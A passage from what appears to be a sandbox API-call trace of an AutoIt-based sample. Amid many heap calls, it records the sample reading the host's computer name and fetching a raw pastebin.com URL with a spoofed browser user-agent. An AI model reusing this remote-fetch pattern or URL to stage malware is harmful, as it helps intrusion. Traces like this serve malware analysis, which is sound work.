(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4b0 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2540 [0201.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x8f3388 [0201.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0201.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1830 [0201.682] GetComputerNameW (in: lpBuffer=0x87f3c8, nSize=0x87f6e4 | out: lpBuffer="XDUWTFONO", nSize=0x87f6e4) returned 1 [0201.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba300 [0201.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0201.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0201.682] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0201.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2540 [0201.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4b0 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba048 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17c0 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8d0 [0201.683] CharUpperBuffW (in: lpsz="AutoIt.Error", cchLength=0xc | out: lpsz="AUTOIT.ERROR") returned 0xc [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2510 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0201.683] CharUpperBuffW (in: lpsz="MyErrFunc", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba660 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba468 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba690 [0201.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5a0 [0201.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba480 [0201.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7b0 [0201.684] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0201.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0201.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf48 [0201.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba030 [0201.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0201.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4b0 [0201.684] CoInitialize (pvReserved=0x0) returned 0x1 [0201.684] CoUninitialize () [0201.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3c) returned 0x8db7f8 [0201.684] CLSIDFromProgID (in: lpszProgID="winhttp.winhttprequest.5.1", lpclsid=0x8db810 | out: lpclsid=0x8db810*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0 [0201.688] CoCreateInstance (in: rclsid=0x8db810*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x8db820*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x87f690 | out: ppv=0x87f690*=0x8e7738) returned 0x0 [0209.636] WinHttpRequest:IUnknown:QueryInterface (in: This=0x8e7738, riid=0x322c9c*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x87f660 | out: ppvObject=0x87f660*=0x0) returned 0x80004002 [0209.636] WinHttpRequest:IUnknown:QueryInterface (in: This=0x8e7738, riid=0x322c4c*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x87f660 | out: ppvObject=0x87f660*=0x0) returned 0x80004002 [0209.636] WinHttpRequest:IUnknown:QueryInterface (in: This=0x8e7738, riid=0x322c0c*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8db800 | out: ppvObject=0x8db800*=0x8e7738) returned 0x0 [0209.636] WinHttpRequest:IUnknown:Release (This=0x8e7738) returned 0x1 [0209.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0209.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0209.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0209.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4b0 | out: hHeap=0x8a0000) returned 1 [0209.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba030 | out: hHeap=0x8a0000) returned 1 [0209.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddf48 | out: hHeap=0x8a0000) returned 1 [0209.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0209.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf48 [0209.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba030 [0209.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0209.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4b0 [0209.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0209.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0209.638] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 1 [0209.639] NtdllDefWindowProc_W () returned 0x1 [0209.640] NtdllDefWindowProc_W () returned 0x1 [0209.640] TranslateMessage (lpMsg=0x87fa74) returned 0 [0209.640] DispatchMessageW (lpMsg=0x87fa74) returned 0x0 [0209.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0209.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17c0 [0209.640] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87f110) returned 1 [0209.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0209.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0209.643] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0209.643] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0209.643] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0209.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0209.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0209.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a80 [0209.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b80 [0209.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17d0 [0209.682] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0209.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1f0 [0209.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba108 [0209.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba060 [0209.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9aa8 [0209.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a78 [0209.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2d0 [0209.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2b8 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9d90 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9cd0 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc910 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc958 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc928 [0209.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de808 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0209.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1940 [0209.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de100 [0209.683] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0209.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de100 | out: hHeap=0x8a0000) returned 1 [0209.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1940 | out: hHeap=0x8a0000) returned 1 [0209.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc928 [0209.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db960 [0209.684] PeekMessageW (in: lpMsg=0x87f1a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f1a4) returned 0 [0209.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de100 [0209.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9a0 [0209.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1940 [0209.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0209.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1940 | out: hHeap=0x8a0000) returned 1 [0209.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0209.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0209.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9a0 | out: hHeap=0x8a0000) returned 1 [0209.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de100 | out: hHeap=0x8a0000) returned 1 [0209.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b3378 | out: hHeap=0x8a0000) returned 1 [0209.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5068 | out: hHeap=0x8a0000) returned 1 [0209.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0209.684] PeekMessageW (in: lpMsg=0x87f1a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f1a4) returned 0 [0209.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8c5068 [0209.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0209.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5068 | out: hHeap=0x8a0000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de100 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9a0 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5068 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0209.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0209.685] PeekMessageW (in: lpMsg=0x87f1a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f1a4) returned 0 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2608 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25f8 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df618 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25e8 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25d8 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x8f3388 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9e8 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25c8 [0209.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9009c0 [0209.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9e8 | out: hHeap=0x8a0000) returned 1 [0209.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f3388 | out: hHeap=0x8a0000) returned 1 [0209.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25d8 | out: hHeap=0x8a0000) returned 1 [0209.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25e8 | out: hHeap=0x8a0000) returned 1 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x900a18 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25e8 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9e8 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25d8 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25b8 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca78 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25a8 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca48 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2598 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2588 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca30 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2578 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc7c0 [0209.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2568 [0209.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc808 [0209.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2558 [0210.710] InternetCrackUrlW (in: lpszUrl="http://pastebin.com/raw.php?i=7MDswaSn", dwUrlLength=0x26, dwFlags=0x0, lpUrlComponents=0x87eaf0 | out: lpUrlComponents=0x87eaf0) returned 1 [0232.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca78 | out: hHeap=0x8a0000) returned 1 [0232.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df8c0 [0232.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca30 | out: hHeap=0x8a0000) returned 1 [0232.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dff00 [0232.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc7c0 | out: hHeap=0x8a0000) returned 1 [0232.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dff50 [0232.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x28) returned 0xbcb1a0 [0232.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c23b8 [0232.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc808 | out: hHeap=0x8a0000) returned 1 [0232.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xbca218 [0232.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbcb1a0 | out: hHeap=0x8a0000) returned 1 [0232.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c23b8 | out: hHeap=0x8a0000) returned 1 [0232.839] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0232.841] InternetSetOptionW (hInternet=0x0, dwOption=0x32, lpBuffer=0x87eb38, dwBufferLength=0x8) returned 1 [0232.844] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x87eb44 | out: lpBuffer=0x0, lpdwBufferLength=0x87eb44) returned 0 [0234.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc220 [0234.150] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x9bc220, lpdwBufferLength=0x87eb44 | out: lpBuffer=0x9bc220, lpdwBufferLength=0x87eb44) returned 1 [0234.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc220 | out: hHeap=0x8a0000) returned 1 [0234.151] InternetConnectW (hInternet=0xcc0004, lpszServerName="pastebin.com", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0234.426] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/raw.php?i=7MDswaSn", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0234.427] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0242.619] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x87eaf8, lpdwBufferLength=0x87eaf0, lpdwIndex=0x87eaf4*=0x0 | out: lpBuffer=0x87eaf8*, lpdwBufferLength=0x87eaf0*=0x4, lpdwIndex=0x87eaf4*=0x0) returned 1 [0242.619] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x5, lpBuffer=0x87eb14, lpdwBufferLength=0x87eb40, lpdwIndex=0x87eb44*=0x0 | out: lpBuffer=0x87eb14, lpdwBufferLength=0x87eb40, lpdwIndex=0x87eb44*=0x0) returned 0 [0242.619] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x87ea78 | out: lpCharType=0x87ea78) returned 1 [0242.619] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x87eaf4, dwFlags=0x0, dwContext=0x0) returned 1 [0242.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2b) returned 0xa3d380 [0242.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xa3d380, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x87eaf8 | out: lpBuffer=0xa3d380*, lpdwNumberOfBytesRead=0x87eaf8*=0x2b) returned 1 [0242.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e6b0 [0242.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1950 [0242.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2b) returned 0xa3d3b8 [0242.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xa3d3b8, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x87eaf8 | out: lpBuffer=0xa3d3b8*, lpdwNumberOfBytesRead=0x87eaf8*=0x0) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d3b8 | out: hHeap=0x8a0000) returned 1 [0242.620] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca218 | out: hHeap=0x8a0000) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2558 | out: hHeap=0x8a0000) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dff50 | out: hHeap=0x8a0000) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2568 | out: hHeap=0x8a0000) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dff00 | out: hHeap=0x8a0000) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2578 | out: hHeap=0x8a0000) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2588 | out: hHeap=0x8a0000) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0242.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2598 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df8c0 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25a8 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25b8 | out: hHeap=0x8a0000) returned 1 [0242.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25b8 [0242.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2b) returned 0xbca218 [0242.621] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0242.621] InternetCloseHandle (hInternet=0xcc0008) returned 0 [0242.621] CloseHandle (hObject=0x0) returned 0 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d380 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e6b0 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9e8 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25d8 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900a18 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25e8 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9009c0 | out: hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25c8 | out: 